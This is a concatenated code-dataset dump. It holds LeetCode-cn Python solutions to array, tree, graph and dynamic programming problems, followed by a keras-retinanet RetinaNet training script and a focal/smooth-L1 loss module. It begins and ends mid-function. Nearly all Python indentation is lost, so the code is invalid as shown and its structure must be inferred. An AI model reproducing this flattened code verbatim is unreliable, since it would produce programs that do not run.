dic = {}
for path in paths:
dic[path[0]] = path[1]
d = dic[paths[0][0]]
while d in dic.keys():
d = dic[d]
return d
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/1442.形成两个异或相等数组的三元组数目.py
```python
class Solution:
def countTriplets(self, arr: List[int]) -> int:
total = 0
n = len(arr)
for i in range(n - 1):
xor = arr[i]
for j in range(i + 1, n):
xor ^= arr[j]
if xor == 0:
total += (j - i)
return total
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/162.寻找峰值.py
```python
class Solution:
def findPeakElement(self, nums: List[int]) -> int:
left, right = 0, len(nums) - 1
while left < right:
mid = (left + right) // 2
if nums[mid] > nums[mid + 1]:
right = mid
else:
left = mid + 1
return right
# @lc code=end
```
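A quick usage check for the peak-finding binary search above (assuming `from typing import List` is in scope, as it is on the LeetCode judge):

```python
s = Solution()
print(s.findPeakElement([1, 2, 3, 1]))           # 2, since nums[2] == 3 is a peak
print(s.findPeakElement([1, 2, 1, 3, 5, 6, 4]))  # 5, since nums[5] == 6 is a peak
```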
#### File: Codeyard/Leetcode-cn/171.excel表列序号.py
```python
class Solution:
def titleToNumber(self, columnTitle: str) -> int:
n = len(columnTitle)
if n == 0:
return n
res = 0
for index, title in enumerate(columnTitle):
res *= 26
res += (ord(title) - ord('A') + 1)
return res
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/1818.绝对差值和.py
```python
import bisect
class Solution:
def minAbsoluteSumDiff(self, nums1: List[int], nums2: List[int]) -> int:
def biSec(nums: List[int], target: int) -> int:
left, right = 0, len(nums) - 1
while left <= right:
mid = (left + right) // 2
if nums[mid] == target:
return mid
elif nums[mid] < target:
left = mid + 1
else:
right = mid - 1
return left
if nums1 == nums2:
return 0
sortNums, n, res, ma, MOD = sorted(nums1), len(nums1), 0, 0, 10 ** 9 + 7
for i in range(n):
num1, num2 = nums1[i], nums2[i]
diff = abs(num1 - num2)
res = (res + diff) % MOD
target = biSec(sortNums, num2)
            # if target > 0, first check the element one position smaller
if target > 0:
ma = max(ma, diff - abs(num2 - sortNums[target - 1]))
            # then check the element one position larger
if target < n:
ma = max(ma, diff - abs(sortNums[target] - num2))
return (res - ma + MOD) % MOD
# 2. Solution2, binary search via the bisect library, Time: O(nlogn), Space: O(n), Runtime: 85%
class Solution:
def minAbsoluteSumDiff(self, nums1: List[int], nums2: List[int]) -> int:
if nums1 == nums2:
return 0
sortNums, n, res, ma, MOD = sorted(nums1), len(nums1), 0, 0, 10 ** 9 + 7
for i in range(n):
num1, num2 = nums1[i], nums2[i]
diff = abs(num1 - num2)
res = (res + diff) % MOD
target = bisect.bisect_left(sortNums, num2)
            # if target > 0, first check the element one position smaller
if target > 0:
ma = max(ma, diff - abs(num2 - sortNums[target - 1]))
            # then check the element one position larger
if target < n:
ma = max(ma, diff - abs(sortNums[target] - num2))
return (res - ma + MOD) % MOD
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/1.两数之和.py
```python
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
dic = {}
for k, v in enumerate(nums):
if v not in dic:
dic[v] = k
t = target - v
if t in dic and dic[t] != k:
return [k, dic[t]]
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/215.数组中的第k个最大元素.py
```python
import heapq
class Solution:
def findKthLargest(self, nums: List[int], k: int) -> int:
n = len(nums)
if n == 0:
return n
nums = sorted(nums)
return nums[-k]
# 2. Solution2, using Python's built-in heap (heapq), Time: O(nlogk), Space: O(n), Runtime: 91%
# - the cost comes from heapifying the list and querying the k largest elements
class Solution:
def findKthLargest(self, nums: List[int], k: int) -> int:
heapq.heapify(nums)
return heapq.nlargest(k, nums)[k - 1]
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/235.二叉搜索树的最近公共祖先.py
```python
class Solution:
def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':
if not root:
return root
if p.val < root.val and q.val < root.val:
return self.lowestCommonAncestor(root.left, p, q)
elif p.val > root.val and q.val > root.val:
return self.lowestCommonAncestor(root.right, p, q)
else:
return root
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/240.搜索二维矩阵-ii.py
```python
class Solution:
def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:
rows, cols = len(matrix), len(matrix[0])
for row in range(rows):
if matrix[row][0] <= target <= matrix[row][cols - 1]:
left, right = 0, cols - 1
while left <= right:
if matrix[row][left] == target or matrix[row][right] == target:
return True
left += 1
right -= 1
return False
"""
2. Solution2, row range + two pointers per row, Time: O(m * n), Space: O(1), Runtime: 97%
- first narrow the vertical range of candidate rows, then scan each row in that range with left/right pointers moving toward the middle
"""
class Solution:
def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:
rows, cols = len(matrix), len(matrix[0])
low, high = 0, rows - 1
while matrix[low][0] > target and low < rows - 1:
low += 1
while matrix[high][0] > target and high > 0:
high -= 1
for row in range(low, high + 1):
if matrix[row][0] <= target <= matrix[row][cols - 1]:
left, right = 0, cols - 1
while left <= right:
if matrix[row][left] == target or matrix[row][right] == target:
return True
left += 1
right -= 1
return False
"""
3. Solution3, Z-shaped traversal, Time: O(m + n), Space: O(1), Runtime: 93%
- start from the top-right corner and walk toward the bottom-left
- `matrix[i][j] == target: return True`
- `matrix[i][j] > target`: each column is ascending, so the rest of this column is also `> target`; move one column to the left
- `matrix[i][j] < target`: each row is ascending, so the rest of this row (to the left) is also `< target`; move one row down
"""
class Solution:
def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:
rows, cols = len(matrix), len(matrix[0])
i, j = 0, cols - 1
while i < rows and j >= 0:
if matrix[i][j] == target:
return True
elif matrix[i][j] > target:
j -= 1
else:
i += 1
return False
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/273.整数转换英文表示.py
```python
class Solution:
def numberToWords(self, num: int) -> str:
singles = ["", "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine"]
teens = ["Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen"]
tens = ["", "Ten", "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty", "Ninety"]
thousand = ["", "Thousand", "Million", "Billion"]
if num == 0:
return "Zero"
def toEnglish(num: int) -> str:
s = ""
if num >= 100:
s += singles[num // 100] + " Hundred "
num %= 100
if num >= 20:
s += tens[num // 10] + " "
num %= 10
if num >= 10:
s += teens[num - 10] + " "
if 0 < num < 10:
s += singles[num] + " "
return s
s = ""
divid = int(1e9)
for i in range(3, -1, -1):
curNum = num // divid
if curNum:
num -= curNum * divid
s += toEnglish(curNum) + thousand[i] + " "
divid //= 1000
return s.strip()
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/345.反转字符串中的元音字母.py
```python
class Solution:
def reverseVowels(self, s: str) -> str:
vowel, n = ['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'], len(s)
i, j, sList = 0, n - 1, list(s)
while i < j:
while i < n and sList[i] not in vowel:
i += 1
while j > 0 and sList[j] not in vowel:
j -= 1
if i < j:
sList[i], sList[j] = sList[j], sList[i]
i += 1
j -= 1
return "".join(sList)
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/363.矩形区域不超过-k-的最大数值和.py
```python
class Solution:
def maxSumSubmatrix(self, matrix: List[List[int]], k: int) -> int:
ans = float("-inf")
m, n = len(matrix), len(matrix[0])
        for i in range(m):  # enumerate the top row boundary
total = [0] * n
            for j in range(i, m):  # enumerate the bottom row boundary
for c in range(n):
                    total[c] += matrix[j][c]  # update each column's running sum between the two boundaries
totalSet = SortedList([0])
s = 0
for v in total:
                    s += v  # s: prefix sum of the current submatrix
lb = totalSet.bisect_left(s - k)
if lb != len(totalSet):
ans = max(ans, s - totalSet[lb])
totalSet.add(s)
return ans
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/50.pow-x-n.py
```python
class Solution:
def myPow(self, x: float, n: int) -> float:
if n < 0:
x = 1 / x
n = -n
pow = 1
while n:
if n & 1:
pow *= x
x *= x
n >>= 1
return pow
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/554.砖墙.py
```python
class Solution:
def leastBricks(self, wall: List[List[int]]) -> int:
dic = {}
rows = len(wall)
for i in range(rows):
distance = 0
for col in range(len(wall[i]) - 1):
distance += wall[i][col]
dic[distance] = dic.get(distance, 0) + 1
big = 0
for k in dic:
big = max(big, dic[k])
return rows - big
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/581.最短无序连续子数组.py
```python
class Solution:
def findUnsortedSubarray(self, nums: List[int]) -> int:
n, start, end = len(nums), 0, 0
nMax, nMin = -float('inf'), float('inf')
for i in range(n):
            # right boundary: whenever an element smaller than the running max appears, extend the right boundary
if nums[i] < nMax:
end = i
else:
nMax = nums[i]
            # left boundary: whenever an element larger than the running min appears, extend the left boundary
if nums[n - i - 1] > nMin:
start = n - i - 1
else:
nMin = nums[n - i - 1]
return 0 if start == end else end - start + 1
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/633.平方数之和.py
```python
class Solution:
def judgeSquareSum(self, c: int) -> bool:
left, right = 0, int(c ** 0.5) + 1
while left <= right:
t = left ** 2 + right ** 2
if t > c:
right -= 1
elif t < c:
left += 1
else:
return True
return False
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/690.员工的重要性.py
```python
class Solution:
def getImportance(self, employees: List['Employee'], id: int) -> int:
dic = {}
for e in employees:
dic[e.id] = e
res = dic[id].importance
subs = dic[id].subordinates
while len(subs) != 0:
sub = subs.pop()
res += dic[sub].importance
subs.extend(dic[sub].subordinates)
return res
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/743.网络延迟时间.py
```python
class Solution:
def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:
matrix = [[float('inf')] * n for _ in range(n)]
        # build the adjacency matrix
for x, y, time in times:
matrix[x - 1][y - 1] = time
        # distance from every node to the source
dis = [float('inf')] * n
dis[k - 1] = 0
        # whether each node has been visited
visited = [False] * n
for _ in range(n):
            # pick the unvisited node closest to the source
x = -1
for index, v in enumerate(visited):
if not v and (x == -1 or dis[index] < dis[x]):
x = index
visited[x] = True
for index, time in enumerate(matrix[x]):
dis[index] = min(dis[index], dis[x] + time)
res = max(dis)
return res if res < float('inf') else -1
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/7.整数反转.py
```python
class Solution:
def reverse(self, x: int) -> int:
res = 0
if x > 0:
flag = 1
elif x < 0:
flag = -1
else:
return 0
x = abs(x)
while x != 0:
res = res * 10 + x % 10
x //= 10
res = flag * res
if (res > (2 ** 31) - 1) or (res < -(2 ** 31)):
return 0
else:
return res
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/802.找到最终的安全状态.py
```python
class Solution:
def eventualSafeNodes(self, graph: List[List[int]]) -> List[int]:
reversedGraph = [[] for _ in graph]
for i, ys in enumerate(graph):
for y in ys:
reversedGraph[y].append(i)
inDeg = [len(ys) for ys in graph]
q = deque([i for i, d in enumerate(inDeg) if d == 0])
while q:
for i in reversedGraph[q.popleft()]:
inDeg[i] -= 1
if inDeg[i] == 0:
q.append(i)
return [i for i, d in enumerate(inDeg) if d == 0]
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/863.二叉树中所有距离为-k-的结点.py
```python
class Solution:
def distanceK(self, root: TreeNode, target: TreeNode, k: int) -> List[int]:
dic, res = {}, []
def dfs(node: TreeNode):
if not node:
return
if node.left:
dic[node.left.val] = node
dfs(node.left)
if node.right:
dic[node.right.val] = node
dfs(node.right)
def findTarget(node: TreeNode, fromNode: TreeNode, depth: int):
if not node:
return
if depth == 0:
res.append(node.val)
return
if node.left and node.left != fromNode:
findTarget(node.left, node, depth - 1)
if node.right and node.right != fromNode:
findTarget(node.right, node, depth - 1)
if node.val in dic and dic[node.val] != fromNode:
findTarget(dic[node.val], node, depth - 1)
dfs(root)
findTarget(target, TreeNode(-1), k)
return res
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/872.叶子相似的树.py
```python
class Solution:
def leafSimilar(self, root1: TreeNode, root2: TreeNode) -> bool:
a, b = [], []
self.traverse(root1, a)
self.traverse(root2, b)
return a == b
def traverse(self, node: TreeNode, res: List[int]):
# if not node:
# return
if node.left:
self.traverse(node.left, res)
if node.right:
self.traverse(node.right, res)
if node and (not node.left) and (not node.right):
res.append(node.val)
return
return
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/91.解码方法.py
```python
class Solution:
def numDecodings(self, s: str) -> int:
n = len(s)
if n == 0:
return 1
a, b, c = 0, 1, 0 # i-2, i-1, i
for i in range(1, n + 1):
c = 0
if s[i - 1] != "0":
c += b
if i > 1 and s[i - 2] != "0" and int(s[i - 2:i]) < 27:
c += a
a, b = b, c
return c
# @lc code=end
```
#### File: Codeyard/Leetcode-cn/剑指 Offer 10- I. 斐波那契数列.py
```python
# Constraints:
# 0 <= n <= 100
# 1. Solution1, DP, Time: O(n), Space: O(1), Runtime: 89%
# - dp[i] = dp[i - 1] + dp[i - 2]
# - only the most recent states are needed, so keep them in three variables
class Solution:
def fib(self, n: int) -> int:
MOD = 10 ** 9 + 7
a, b, c = 0, 1, 0
if n < 2:
return n
for i in range(2, n + 1):
c = (a + b) % MOD
a, b = b, c
return c
``` |
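The DP solution above keeps only the most recent Fibonacci states and reduces the result modulo 10**9 + 7. A quick, hand-checked sanity run (illustrative only, not part of the original file):

```python
s = Solution()
assert s.fib(0) == 0 and s.fib(1) == 1
assert s.fib(10) == 55          # 0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55
print(s.fib(100))               # large values are reported modulo 10**9 + 7
```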
{
"source": "joey66666/vehicle-classify",
"score": 2
} |
#### File: keras_retinanet/bin/train_fc.py
```python
import argparse
import os
import sys
import warnings
import keras
import keras.preprocessing.image
import tensorflow as tf
# Allow relative imports when being executed as script.
if __name__ == "__main__" and __package__ is None:
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..'))
import keras_retinanet.bin # noqa: F401
__package__ = "keras_retinanet.bin"
# Change these to absolute imports if you copy this script outside the keras_retinanet package.
from .. import layers # noqa: F401
from .. import losses_fc
from .. import models
from ..callbacks import RedirectModel
from ..callbacks.eval import Evaluate
from ..models.retinanet_fc import retinanet_bbox
from ..preprocessing.csv_generator import CSVGenerator
from ..preprocessing.kitti import KittiGenerator
from ..preprocessing.open_images import OpenImagesGenerator
from ..preprocessing.pascal_voc import PascalVocGenerator
from ..utils.anchors import make_shapes_callback
from ..utils.config import read_config_file, parse_anchor_parameters
from ..utils.keras_version import check_keras_version
from ..utils.model import freeze as freeze_model
from ..utils.transform import random_transform_generator
def makedirs(path):
# Intended behavior: try to create the directory,
# pass if the directory exists already, fails otherwise.
# Meant for Python 2.7/3.n compatibility.
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
def get_session():
""" Construct a modified tf session.
"""
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
return tf.Session(config=config)
def model_with_weights(model, weights, skip_mismatch):
""" Load weights for model.
Args
model : The model to load weights for.
weights : The weights to load.
skip_mismatch : If True, skips layers whose shape of weights doesn't match with the model.
"""
if weights is not None:
model.load_weights(weights, by_name=True, skip_mismatch=skip_mismatch)
return model
def create_models(backbone_retinanet, num_classes, weights, multi_gpu=0,
freeze_backbone=False, lr=1e-5, config=None):
""" Creates three models (model, training_model, prediction_model).
Args
backbone_retinanet : A function to call to create a retinanet model with a given backbone.
num_classes : The number of classes to train.
weights : The weights to load into the model.
multi_gpu : The number of GPUs to use for training.
freeze_backbone : If True, disables learning for the backbone.
config : Config parameters, None indicates the default configuration.
Returns
model : The base model. This is also the model that is saved in snapshots.
training_model : The training model. If multi_gpu=0, this is identical to model.
prediction_model : The model wrapped with utility functions to perform object detection (applies regression values and performs NMS).
"""
modifier = freeze_model if freeze_backbone else None
# load anchor parameters, or pass None (so that defaults will be used)
anchor_params = None
num_anchors = None
if config and 'anchor_parameters' in config:
anchor_params = parse_anchor_parameters(config)
num_anchors = anchor_params.num_anchors()
# Keras recommends initialising a multi-gpu model on the CPU to ease weight sharing, and to prevent OOM errors.
# optionally wrap in a parallel model
if multi_gpu > 1:
from keras.utils import multi_gpu_model
with tf.device('/cpu:0'):
model = model_with_weights(backbone_retinanet(num_classes, num_anchors=num_anchors, modifier=modifier), weights=weights, skip_mismatch=True)
training_model = multi_gpu_model(model, gpus=multi_gpu)
else:
model = model_with_weights(backbone_retinanet(num_classes, num_anchors=num_anchors, modifier=modifier), weights=weights, skip_mismatch=True)
training_model = model
# make prediction model
prediction_model = retinanet_bbox(model=model, anchor_params=anchor_params)
# compile model
training_model.compile(
loss={
'regression' : losses_fc.smooth_l1(),
'classification': losses_fc.focal(),
'choose': losses_fc.smooth_l1()
},
optimizer=keras.optimizers.adam(lr=lr, clipnorm=0.001)
)
return model, training_model, prediction_model
def create_callbacks(model, training_model, prediction_model, validation_generator, args):
""" Creates the callbacks to use during training.
Args
model: The base model.
training_model: The model that is used for training.
prediction_model: The model that should be used for validation.
validation_generator: The generator for creating validation data.
args: parseargs args object.
Returns:
A list of callbacks used for training.
"""
callbacks = []
tensorboard_callback = None
if args.tensorboard_dir:
tensorboard_callback = keras.callbacks.TensorBoard(
log_dir = args.tensorboard_dir,
histogram_freq = 0,
batch_size = args.batch_size,
write_graph = True,
write_grads = False,
write_images = False,
embeddings_freq = 0,
embeddings_layer_names = None,
embeddings_metadata = None
)
callbacks.append(tensorboard_callback)
if args.evaluation and validation_generator:
if args.dataset_type == 'coco':
from ..callbacks.coco import CocoEval
# use prediction model for evaluation
evaluation = CocoEval(validation_generator, tensorboard=tensorboard_callback)
else:
evaluation = Evaluate(validation_generator, tensorboard=tensorboard_callback, weighted_average=args.weighted_average)
evaluation = RedirectModel(evaluation, prediction_model)
callbacks.append(evaluation)
# save the model
if args.snapshots:
# ensure directory created first; otherwise h5py will error after epoch.
makedirs(args.snapshot_path)
checkpoint = keras.callbacks.ModelCheckpoint(
os.path.join(
args.snapshot_path,
'{backbone}_{dataset_type}_{{epoch:02d}}.h5'.format(backbone=args.backbone, dataset_type=args.dataset_type)
),
verbose=1,
# save_best_only=True,
# monitor="mAP",
# mode='max'
)
checkpoint = RedirectModel(checkpoint, model)
callbacks.append(checkpoint)
callbacks.append(keras.callbacks.ReduceLROnPlateau(
monitor = 'loss',
factor = 0.1,
patience = 2,
verbose = 1,
mode = 'auto',
min_delta = 0.0001,
cooldown = 0,
min_lr = 0
))
return callbacks
def create_generators(args, preprocess_image):
""" Create generators for training and validation.
Args
args : parseargs object containing configuration for generators.
preprocess_image : Function that preprocesses an image for the network.
"""
common_args = {
'batch_size' : args.batch_size,
'config' : args.config,
'image_min_side' : args.image_min_side,
'image_max_side' : args.image_max_side,
'preprocess_image' : preprocess_image,
}
# create random transform generator for augmenting training data
if args.random_transform:
transform_generator = random_transform_generator(
min_rotation=-0.1,
max_rotation=0.1,
min_translation=(-0.1, -0.1),
max_translation=(0.1, 0.1),
min_shear=-0.1,
max_shear=0.1,
min_scaling=(0.9, 0.9),
max_scaling=(1.1, 1.1),
flip_x_chance=0.5,
flip_y_chance=0.5,
)
else:
transform_generator = random_transform_generator(flip_x_chance=0.5)
if args.dataset_type == 'coco':
# import here to prevent unnecessary dependency on cocoapi
from ..preprocessing.coco import CocoGenerator
train_generator = CocoGenerator(
args.coco_path,
'train2017',
transform_generator=transform_generator,
**common_args
)
validation_generator = CocoGenerator(
args.coco_path,
'val2017',
**common_args
)
elif args.dataset_type == 'pascal':
train_generator = PascalVocGenerator(
args.pascal_path,
'trainval',
transform_generator=transform_generator,
**common_args
)
validation_generator = PascalVocGenerator(
args.pascal_path,
'test',
**common_args
)
elif args.dataset_type == 'csv':
train_generator = CSVGenerator(
args.annotations,
args.classes,
transform_generator=transform_generator,
**common_args
)
if args.val_annotations:
validation_generator = CSVGenerator(
args.val_annotations,
args.classes,
**common_args
)
else:
validation_generator = None
elif args.dataset_type == 'oid':
train_generator = OpenImagesGenerator(
args.main_dir,
subset='train',
version=args.version,
labels_filter=args.labels_filter,
annotation_cache_dir=args.annotation_cache_dir,
parent_label=args.parent_label,
transform_generator=transform_generator,
**common_args
)
validation_generator = OpenImagesGenerator(
args.main_dir,
subset='validation',
version=args.version,
labels_filter=args.labels_filter,
annotation_cache_dir=args.annotation_cache_dir,
parent_label=args.parent_label,
**common_args
)
elif args.dataset_type == 'kitti':
train_generator = KittiGenerator(
args.kitti_path,
subset='train',
transform_generator=transform_generator,
**common_args
)
validation_generator = KittiGenerator(
args.kitti_path,
subset='val',
**common_args
)
else:
raise ValueError('Invalid data type received: {}'.format(args.dataset_type))
return train_generator, validation_generator
def check_args(parsed_args):
""" Function to check for inherent contradictions within parsed arguments.
For example, batch_size < num_gpus
Intended to raise errors prior to backend initialisation.
Args
parsed_args: parser.parse_args()
Returns
parsed_args
"""
if parsed_args.multi_gpu > 1 and parsed_args.batch_size < parsed_args.multi_gpu:
raise ValueError(
"Batch size ({}) must be equal to or higher than the number of GPUs ({})".format(parsed_args.batch_size,
parsed_args.multi_gpu))
if parsed_args.multi_gpu > 1 and parsed_args.snapshot:
raise ValueError(
"Multi GPU training ({}) and resuming from snapshots ({}) is not supported.".format(parsed_args.multi_gpu,
parsed_args.snapshot))
if parsed_args.multi_gpu > 1 and not parsed_args.multi_gpu_force:
raise ValueError("Multi-GPU support is experimental, use at own risk! Run with --multi-gpu-force if you wish to continue.")
if 'resnet' not in parsed_args.backbone:
warnings.warn('Using experimental backbone {}. Only resnet50 has been properly tested.'.format(parsed_args.backbone))
return parsed_args
def parse_args(args):
""" Parse the arguments.
"""
parser = argparse.ArgumentParser(description='Simple training script for training a RetinaNet network.')
subparsers = parser.add_subparsers(help='Arguments for specific dataset types.', dest='dataset_type')
subparsers.required = True
coco_parser = subparsers.add_parser('coco')
coco_parser.add_argument('coco_path', help='Path to dataset directory (ie. /tmp/COCO).')
pascal_parser = subparsers.add_parser('pascal')
pascal_parser.add_argument('pascal_path', help='Path to dataset directory (ie. /tmp/VOCdevkit).')
kitti_parser = subparsers.add_parser('kitti')
kitti_parser.add_argument('kitti_path', help='Path to dataset directory (ie. /tmp/kitti).')
def csv_list(string):
return string.split(',')
oid_parser = subparsers.add_parser('oid')
oid_parser.add_argument('main_dir', help='Path to dataset directory.')
oid_parser.add_argument('--version', help='The current dataset version is v4.', default='v4')
oid_parser.add_argument('--labels-filter', help='A list of labels to filter.', type=csv_list, default=None)
oid_parser.add_argument('--annotation-cache-dir', help='Path to store annotation cache.', default='.')
oid_parser.add_argument('--parent-label', help='Use the hierarchy children of this label.', default=None)
csv_parser = subparsers.add_parser('csv')
csv_parser.add_argument('annotations', help='Path to CSV file containing annotations for training.')
csv_parser.add_argument('classes', help='Path to a CSV file containing class label mapping.')
csv_parser.add_argument('--val-annotations', help='Path to CSV file containing annotations for validation (optional).')
group = parser.add_mutually_exclusive_group()
group.add_argument('--snapshot', help='Resume training from a snapshot.')
group.add_argument('--imagenet-weights', help='Initialize the model with pretrained imagenet weights. This is the default behaviour.', action='store_const', const=True, default=True)
group.add_argument('--weights', help='Initialize the model with weights from a file.')
group.add_argument('--no-weights', help='Don\'t initialize the model with any weights.', dest='imagenet_weights', action='store_const', const=False)
parser.add_argument('--backbone', help='Backbone model used by retinanet.', default='resnet50', type=str)
parser.add_argument('--batch-size', help='Size of the batches.', default=1, type=int)
parser.add_argument('--gpu', help='Id of the GPU to use (as reported by nvidia-smi).')
parser.add_argument('--multi-gpu', help='Number of GPUs to use for parallel processing.', type=int, default=0)
parser.add_argument('--multi-gpu-force', help='Extra flag needed to enable (experimental) multi-gpu support.', action='store_true')
parser.add_argument('--epochs', help='Number of epochs to train.', type=int, default=50)
parser.add_argument('--steps', help='Number of steps per epoch.', type=int, default=10000)
parser.add_argument('--lr', help='Learning rate.', type=float, default=1e-5)
parser.add_argument('--snapshot-path', help='Path to store snapshots of models during training (defaults to \'./snapshots\')', default='./snapshots')
parser.add_argument('--tensorboard-dir', help='Log directory for Tensorboard output', default='./logs')
parser.add_argument('--no-snapshots', help='Disable saving snapshots.', dest='snapshots', action='store_false')
parser.add_argument('--no-evaluation', help='Disable per epoch evaluation.', dest='evaluation', action='store_false')
parser.add_argument('--freeze-backbone', help='Freeze training of backbone layers.', action='store_true')
parser.add_argument('--random-transform', help='Randomly transform image and annotations.', action='store_true')
parser.add_argument('--image-min-side', help='Rescale the image so the smallest side is min_side.', type=int, default=800)
parser.add_argument('--image-max-side', help='Rescale the image if the largest side is larger than max_side.', type=int, default=1333)
parser.add_argument('--config', help='Path to a configuration parameters .ini file.')
parser.add_argument('--weighted-average', help='Compute the mAP using the weighted average of precisions among classes.', action='store_true')
# Fit generator arguments
parser.add_argument('--workers', help='Number of multiprocessing workers. To disable multiprocessing, set workers to 0', type=int, default=1)
parser.add_argument('--max-queue-size', help='Queue length for multiprocessing workers in fit generator.', type=int, default=10)
return check_args(parser.parse_args(args))
def main(args=None):
# parse arguments
if args is None:
args = sys.argv[1:]
args = parse_args(args)
# create object that stores backbone information
backbone = models.backbone(args.backbone)
# make sure keras is the minimum required version
check_keras_version()
# optionally choose specific GPU
if args.gpu:
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
keras.backend.tensorflow_backend.set_session(get_session())
# optionally load config parameters
if args.config:
args.config = read_config_file(args.config)
# create the generators
train_generator, validation_generator = create_generators(args, backbone.preprocess_image)
# create the model
if args.snapshot is not None:
print('Loading model, this may take a second...')
model = models.load_model(args.snapshot, backbone_name=args.backbone)
training_model = model
anchor_params = None
if args.config and 'anchor_parameters' in args.config:
anchor_params = parse_anchor_parameters(args.config)
prediction_model = retinanet_bbox(model=model, anchor_params=anchor_params)
else:
weights = args.weights
# default to imagenet if nothing else is specified
if weights is None and args.imagenet_weights:
weights = backbone.download_imagenet()
print('Creating model, this may take a second...')
model, training_model, prediction_model = create_models(
backbone_retinanet=backbone.retinanet,
num_classes=train_generator.num_classes(),
weights=weights,
multi_gpu=args.multi_gpu,
freeze_backbone=args.freeze_backbone,
lr=args.lr,
config=args.config
)
# print model summary
print(model.summary())
# this lets the generator compute backbone layer shapes using the actual backbone model
if 'vgg' in args.backbone or 'densenet' in args.backbone:
train_generator.compute_shapes = make_shapes_callback(model)
if validation_generator:
validation_generator.compute_shapes = train_generator.compute_shapes
# create the callbacks
callbacks = create_callbacks(
model,
training_model,
prediction_model,
validation_generator,
args,
)
# Use multiprocessing if workers > 0
if args.workers > 0:
use_multiprocessing = True
else:
use_multiprocessing = False
# start training
training_model.fit_generator(
generator=train_generator,
steps_per_epoch=args.steps,
epochs=args.epochs,
verbose=1,
callbacks=callbacks,
workers=args.workers,
        use_multiprocessing=use_multiprocessing,
max_queue_size=args.max_queue_size
)
if __name__ == '__main__':
main()
```
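The script is driven entirely by `parse_args`: global flags go before the dataset-type subcommand, while generator-specific options such as `--val-annotations` follow it. A hypothetical invocation for the CSV path, with placeholder file names, might look like this:

```python
# illustrative only: exercising the argument parser with hypothetical paths
args = parse_args([
    '--backbone', 'resnet50',
    '--batch-size', '2',
    '--steps', '500',
    'csv', 'annotations.csv', 'classes.csv',
    '--val-annotations', 'val.csv',
])
print(args.dataset_type, args.annotations, args.val_annotations)
```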
#### File: keras-retinanet/keras_retinanet/losses_fc.py
```python
import keras
from . import backend
def focal(alpha=0.25, gamma=2.0):
""" Create a functor for computing the focal loss.
Args
alpha: Scale the focal weight with alpha.
gamma: Take the power of the focal weight with gamma.
Returns
A functor that computes the focal loss using the alpha and gamma.
"""
def _focal(y_true, y_pred):
""" Compute the focal loss given the target tensor and the predicted tensor.
As defined in https://arxiv.org/abs/1708.02002
Args
y_true: Tensor of target data from the generator with shape (B, N, num_classes).
y_pred: Tensor of predicted data from the network with shape (B, N, num_classes).
Returns
The focal loss of y_pred w.r.t. y_true.
"""
labels = y_true[:, :, :-1]
anchor_state = y_true[:, :, -1] # -1 for ignore, 0 for background, 1 for object
classification = y_pred
# filter out "ignore" anchors
indices = backend.where(keras.backend.not_equal(anchor_state, -1))
labels = backend.gather_nd(labels, indices)
classification = backend.gather_nd(classification, indices)
# compute the focal loss
alpha_factor = keras.backend.ones_like(labels) * alpha
alpha_factor = backend.where(keras.backend.equal(labels, 1), alpha_factor, 1 - alpha_factor)
focal_weight = backend.where(keras.backend.equal(labels, 1), 1 - classification, classification)
focal_weight = alpha_factor * focal_weight ** gamma
cls_loss = focal_weight * keras.backend.binary_crossentropy(labels, classification)
# compute the normalizer: the number of positive anchors
normalizer = backend.where(keras.backend.equal(anchor_state, 1))
normalizer = keras.backend.cast(keras.backend.shape(normalizer)[0], keras.backend.floatx())
normalizer = keras.backend.maximum(keras.backend.cast_to_floatx(1.0), normalizer)
return keras.backend.sum(cls_loss) / normalizer
return _focal
def smooth_l1(sigma=3.0):
""" Create a smooth L1 loss functor.
Args
sigma: This argument defines the point where the loss changes from L2 to L1.
Returns
A functor for computing the smooth L1 loss given target data and predicted data.
"""
sigma_squared = sigma ** 2
def _smooth_l1(y_true, y_pred):
""" Compute the smooth L1 loss of y_pred w.r.t. y_true.
Args
y_true: Tensor from the generator of shape (B, N, 5). The last value for each box is the state of the anchor (ignore, negative, positive).
y_pred: Tensor from the network of shape (B, N, 4).
Returns
The smooth L1 loss of y_pred w.r.t. y_true.
"""
# separate target and state
regression = y_pred
regression_target = y_true[:, :, :-1]
anchor_state = y_true[:, :, -1]
# filter out "ignore" anchors
indices = backend.where(keras.backend.equal(anchor_state, 1))
regression = backend.gather_nd(regression, indices)
regression_target = backend.gather_nd(regression_target, indices)
# compute smooth L1 loss
# f(x) = 0.5 * (sigma * x)^2 if |x| < 1 / sigma / sigma
# |x| - 0.5 / sigma / sigma otherwise
